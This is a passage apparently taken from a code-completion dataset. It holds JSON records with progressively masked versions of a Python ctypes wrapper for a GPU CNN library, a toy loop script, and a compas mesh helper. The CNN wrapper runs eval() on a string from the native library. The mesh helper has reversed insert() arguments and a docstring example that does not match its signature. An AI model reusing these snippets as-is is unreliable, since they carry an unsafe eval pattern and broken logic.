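#   net.addPoolLayer(2, 2)
#   net.addFullConnectLayer(10, FSIGMOIG)
#   net.compile()
#   net.predict(flat_image)                # flat_image: hypothetical list of 28*28 doubles
#   net.learn(one_hot_target)              # one_hot_target: hypothetical list of 10 doubles
#   print(net.getOutputAsIndexMax())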
|
normal
|
{
"blob_id": "32db21ed7f57f29260d70513d8c34de53adf12d7",
"index": 5740,
"step-1": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n <mask token>\n <mask token>\n <mask token>\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n <mask token>\n <mask token>\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n <mask token>\n <mask token>\n <mask token>\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n <mask token>\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n <mask token>\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
"step-3": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx),\n c.addressof(iny), c.addressof(inz), c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out\n )\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error:\n raise Exception('ERROR')\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx\n ), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(\n inx), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n\n @property\n def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'), 255)\n clib.getCnnErrormsg(self.cnn.p, buff)\n return buff.value.decode('utf-8')\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n\n def 
getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
"step-4": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n <mask token>\n <mask token>\n\n def predict(self, input):\n tinput = self.createInp(*input)\n clib.CnnCall(self.cnn.p, tinput)\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx),\n c.addressof(iny), c.addressof(inz), c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out\n )\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error:\n raise Exception('ERROR')\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx\n ), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(\n inx), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n\n @property\n def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'), 255)\n clib.getCnnErrormsg(self.cnn.p, buff)\n return buff.value.decode('utf-8')\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n 
clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n\n def getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
"step-5": "import time,pickle\nfrom CNN_GPU.CNN_C_Wrapper import *\nfrom pathlib import Path\n\nFSIGMOIG = 0\nFTANH = 2\nFRELU = 4\n\nREQUEST_INPUT = 0\nREQUEST_GRAD_INPUT = 1\nREQUEST_OUTPUT = 2\nREQUEST_WEIGTH = 3\n\nclass CNN:\n def __init__(self, inputSize, hitLearn=.1, momentum=.9, weigthDecay=.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer(file),\n hitLearn, momentum, weigthDecay, multip, inputSize[0], inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n\n def addDropOutLayer(self, pontoAtivacao, seed):\n clib.CnnAddDropOutLayer(self.cnn.p, pontoAtivacao, seed)\n\n def addFullConnectLayer(self, saida, funcaoAtivacao):\n clib.CnnAddFullConnectLayer(self.cnn.p, saida, funcaoAtivacao)\n\n def predict(self, input):\n tinput = self.createInp(*input)\n clib.CnnCall(self.cnn.p, tinput)\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None: return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out)\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error: raise Exception(\"ERROR\")\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.cast(0, c.c_void_p))\n if err != 0: raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),\n c.cast(0, c.c_void_p))\n if err != 0: raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName:str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2,2,1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n @property\n 
def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'),255)\n clib.getCnnErrormsg(self.cnn.p,buff)\n return buff.value.decode('utf-8')\n def salveCnnDescriptor(self,file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c),self.cnn.p)\n msg = c.cast(desc_c.p,c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file,'wb') as f:\n pickle.dump(desc,f)\n # AUXILIAR FUNCTION\n def getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n def normalizeVector(self,vector:list,maxOutput,minOutput):\n out_TYPE =c.c_double * len(vector)\n inp = out_TYPE(*vector)\n out = out_TYPE()\n clib.normalizeGPU(self.cnn.p,inp,out,len(vector),maxOutput,minOutput)\n return list(out)\n def normalizeVectorKnowedSpace(self,vector:list,maxInput,minInput,maxOutput,minOutput):\n out_TYPE =c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p,tmp_inp,tmp_out,len(vector),maxInput,minInput,maxOutput,minOutput)\n return list(tmp_out)\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte*(w*h))()\n c.memmove(out,p.p,w*h)\n a = bytes(out)\n clib.freeP(p.p)\n return (h,w,a)",
"step-ids": [
7,
12,
20,
21,
27
]
}
|
[
7,
12,
20,
21,
27
] |
a = 1
b = 2
print(a + b)
print("hello")
list = [1, 2, 3, 4, 5]
for i in list:
if i % 2 != 0:
print(i)
print("branch")
|
normal
|
{
"blob_id": "03b325094bd3e77f467e17ce54deb95bf2b5c727",
"index": 1724,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a + b)\nprint('hello')\n<mask token>\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint('branch')\n",
"step-3": "a = 1\nb = 2\nprint(a + b)\nprint('hello')\nlist = [1, 2, 3, 4, 5]\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint('branch')\n",
"step-4": "a = 1\nb = 2\nprint(a + b)\nprint(\"hello\")\n\nlist = [1, 2, 3, 4, 5]\n\nfor i in list:\n if i % 2 != 0:\n print(i)\nprint(\"branch\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__all__ = [
'mesh_add_vertex_to_face_edge'
]
def mesh_add_vertex_to_face_edge(mesh, key, fkey, v):
"""Add an existing vertex of the mesh to an existing face.
Parameters
----------
mesh : compas.datastructures.Mesh
The mesh data structure.
key : hashable
The identifier of the vertex.
fkey : hashable
The identifier of the face.
v : hashable
The identifier of the vertex before which the new vertex should be added.
Notes
-----
The algorithm is merely there for convenience.
It does not check if the resulting mesh is still valid.
Examples
--------
Consider the following points and one face definition and the resulting mesh.
>>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]
>>> faces = [[0, 1, 2, 3]]
>>> mesh = Mesh.from_vertices_and_faces(points, faces)
>>> mesh.number_of_vertices()
5
>>> mesh.number_of_faces()
1
>>> mesh.face_degree(0)
4
>>> mesh.vertex_degree(4)
0
To add the isolated vertex to the single mesh face
>>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)
>>> mesh.face_degree(0)
5
>>> mesh.vertex_degree(4)
2
"""
vertices = mesh.face_vertices(fkey)
i = vertices.index(v)
u = vertices[i - 1]
vertices.insert(key, i - 1)
mesh.halfedge[u][key] = fkey
mesh.halfedge[key][v] = fkey
if u not in mesh.halfedge[key]:
mesh.halfedge[key][u] = None
if key not in mesh.halfedge[v]:
mesh.halfedge[v][key] = None
del mesh.halfedge[u][v]
if u in mesh.halfedge[v]:
del mesh.halfedge[v][u]
if (u, v) in mesh.edgedata:
del mesh.edgedata[u, v]
if (v, u) in mesh.edgedata:
del mesh.edgedata[v, u]
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
normal
|
{
"blob_id": "d9b6efce92e30267a9f992c4fea698fe14e0c3e4",
"index": 1398,
"step-1": "<mask token>\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
"step-3": "<mask token>\n__all__ = ['mesh_add_vertex_to_face_edge']\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n__all__ = ['mesh_add_vertex_to_face_edge']\n\n\ndef mesh_add_vertex_to_face_edge(mesh, key, fkey, v):\n \"\"\"Add an existing vertex of the mesh to an existing face.\n\n Parameters\n ----------\n mesh : compas.datastructures.Mesh\n The mesh data structure.\n key : hashable\n The identifier of the vertex.\n fkey : hashable\n The identifier of the face.\n v : hashable\n The identifier of the vertex before which the new vertex should be added.\n\n Notes\n -----\n The algorithm is merely there for convenience.\n It does not check if the resulting mesh is still valid.\n\n Examples\n --------\n Consider the following points and one face definition and the resulting mesh.\n\n >>> points = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.5, 0.0, 0.0]]\n >>> faces = [[0, 1, 2, 3]]\n >>> mesh = Mesh.from_vertices_and_faces(points, faces)\n >>> mesh.number_of_vertices()\n 5\n >>> mesh.number_of_faces()\n 1\n >>> mesh.face_degree(0)\n 4\n >>> mesh.vertex_degree(4)\n 0\n\n To add the isolated vertex to the single mesh face\n\n >>> mesh_add_vertex_to_face_edge(mesh, 4, 0, 0, 1)\n >>> mesh.face_degree(0)\n 5\n >>> mesh.vertex_degree(4)\n 2\n\n \"\"\"\n vertices = mesh.face_vertices(fkey)\n i = vertices.index(v)\n u = vertices[i - 1]\n vertices.insert(key, i - 1)\n mesh.halfedge[u][key] = fkey\n mesh.halfedge[key][v] = fkey\n if u not in mesh.halfedge[key]:\n mesh.halfedge[key][u] = None\n if key not in mesh.halfedge[v]:\n mesh.halfedge[v][key] = None\n del mesh.halfedge[u][v]\n if u in mesh.halfedge[v]:\n del mesh.halfedge[v][u]\n if (u, v) in mesh.edgedata:\n del mesh.edgedata[u, v]\n if (v, u) in mesh.edgedata:\n del mesh.edgedata[v, u]\n\n\nif __name__ == '__main__':\n pass\n",
